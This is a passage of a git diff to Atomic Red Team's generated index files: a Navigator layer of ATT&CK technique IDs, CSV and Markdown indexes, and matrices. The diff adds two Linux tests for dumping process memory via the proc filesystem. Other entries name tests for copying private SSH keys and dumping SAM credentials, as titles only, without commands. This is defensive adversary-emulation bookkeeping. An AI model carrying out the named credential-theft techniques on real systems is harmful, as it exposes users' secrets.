,{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 0eda063b..e9d78206 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -64,6 +64,8 @@ credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5- credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh +credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh +credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index f06859b0..c9e1bb22 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -11,6 +11,8 @@ credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-49 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh +credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh +credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f6da33e1..bd9b1af6 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -107,7 +107,9 @@ - Atomic Test #2: Discover Private SSH Keys [macos, linux] - Atomic Test #3: Copy Private SSH Keys with CP [linux] - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux] -- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md) + - Atomic Test #1: Dump individual process memory with sh (Local) [linux] + - Atomic Test #2: Dump individual process memory with Python (Local) [linux] - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 2adc7269..678b261a 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -37,7 +37,9 @@ - Atomic Test #2: Discover Private SSH Keys [macos, linux] - Atomic Test #3: Copy Private SSH Keys with CP [linux] - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux] -- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md) + - Atomic Test #1: Dump individual process memory with sh (Local) [linux] + - Atomic Test #2: Dump individual process memory with Python (Local) [linux] - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index 420df707..33891a6e 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md @@ -26,7 +26,7 @@ | | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | -| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index a8def1e4..acd405f4 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -43,7 +43,7 @@ | | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | | | -| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | | | | | | | | | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 